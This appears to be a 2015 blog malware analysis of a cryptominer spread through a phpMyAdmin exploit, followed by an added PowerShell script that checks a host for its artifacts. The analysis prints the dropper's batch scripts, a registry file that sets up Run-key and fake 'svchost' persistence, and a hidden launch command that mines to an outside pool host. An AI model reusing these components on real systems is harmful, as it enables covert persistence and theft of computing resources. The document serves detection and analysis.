Saturday, January 31, 2015

Miner Spreading over Zmeu

Infected machine: CPU at 100%, binary execution dir was C:\appserv\phpmyadmin\; following the logs, it got infected through that PMA (phpMyAdmin) exploit.


init.exe - SFX archive that calls another SFX archive called sys.exe

sys.exe

run.bat
@ECHO OFF
START /WAIT /B taskkill /F /IM init.exe > nul
ping -n 3 -w 2 127.0.0.1 > nul
call geox.exe -pula
:end
geox.exe

run.bat - sets hidden mode on the folders
@ECHO OFF
setx GPU_MAX_ALLOC_PERCENT 100
setx GPU_USE_SYNC_OBJECTS 1
START /WAIT /B regedit /s %SystemRoot%\init\spoolv32\reg.reg
START /WAIT /B %SystemRoot%\init\spoolv32\bash
START /WAIT /B regedit /s %SystemRoot%\init\spoolv64\reg.reg
START /WAIT /B %SystemRoot%\init\spoolv64\bash
START attrib +H +S %SystemRoot%\init
reg.reg - sets itself up at startup (Run key and a fake "svchost" service)

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost\Parameters]

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost\Parameters]
"Application"="\"C:\\Windows\\init\\spoolv32\\bash.lnk\""
"AppDirectory"="\"C:\\Windows\\init\\spoolv32\\bash.lnk\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"spoolv"="\"C:\\Windows\\init\\spoolv32\\bash.lnk\""


bash.lnk - also starts the miner with the following command, host, user and pass:
%SystemRoot%\init\hstart.exe /NOCONSOLE /SILENT /D="%SystemRoot%\init\spoolv32" /HIGH "%SystemRoot%\init\spoolv32\init.exe -o stratum+tcp://stratum.wemineftc.com:80 -O geox.1:x"


init.exe - the miner executable; it also has a help command.
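As an added example (not part of the original post), a PowerShell triage check that looks for the persistence artifacts listed above on a suspect host: the "spoolv" Run key entry, the fake svchost Parameters value, the hidden %SystemRoot%\init folder, the setx variables and the running miner processes. Paths and value names come from the post; the process names and environment scopes are assumptions.

```powershell
# Added triage script, not from the original post. Run from an elevated PowerShell.
$findings = @()
$runKey  = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
$svcKey  = 'HKLM:\SYSTEM\CurrentControlSet\Services\svchost\Parameters'
$initDir = Join-Path $env:SystemRoot 'init'

# 1. Run key entry "spoolv" (reg.reg) pointing at bash.lnk
$run = Get-ItemProperty -Path $runKey -ErrorAction SilentlyContinue
if ($run -and $run.PSObject.Properties['spoolv']) {
    $findings += "Run key 'spoolv' -> $($run.spoolv)"
}

# 2. "svchost" service Parameters with an Application value (real svchost has none)
$svc = Get-ItemProperty -Path $svcKey -ErrorAction SilentlyContinue
if ($svc -and $svc.PSObject.Properties['Application']) {
    $findings += "svchost Parameters\Application -> $($svc.Application)"
}

# 3. %SystemRoot%\init folder, hidden by 'attrib +H +S' so -Force is needed to see it
if (Test-Path -LiteralPath $initDir) {
    $item = Get-Item -LiteralPath $initDir -Force
    $findings += "Directory $initDir exists (attributes: $($item.Attributes))"
    Get-ChildItem -LiteralPath $initDir -Recurse -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -in 'init.exe','hstart.exe','bash.lnk','reg.reg','run.bat','bash' } |
        ForEach-Object { $findings += "  file: $($_.FullName)" }
}

# 4. GPU tuning variables persisted with setx (user scope normally; machine scope checked too)
foreach ($v in 'GPU_MAX_ALLOC_PERCENT','GPU_USE_SYNC_OBJECTS') {
    foreach ($scope in 'User','Machine') {
        $val = [Environment]::GetEnvironmentVariable($v, $scope)
        if ($val) { $findings += "$scope env var $v=$val" }
    }
}

# 5. Miner/launcher processes (names assumed from the post) and their established connections
$procs = Get-Process -Name 'init','hstart' -ErrorAction SilentlyContinue
foreach ($p in $procs) {
    $findings += "Process $($p.Name) PID $($p.Id) path $($p.Path)"
    if (Get-Command Get-NetTCPConnection -ErrorAction SilentlyContinue) {
        Get-NetTCPConnection -OwningProcess $p.Id -State Established -ErrorAction SilentlyContinue |
            ForEach-Object { $findings += "  connection -> $($_.RemoteAddress):$($_.RemotePort)" }
    }
}

if ($findings.Count -eq 0) { 'No artifacts of this miner found.' } else { $findings }
```

Every hit is a confirmation of a known artifact rather than a heuristic, so a clean result does not prove the host is clean if the dropper was modified.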



VirusTotal - Malwr
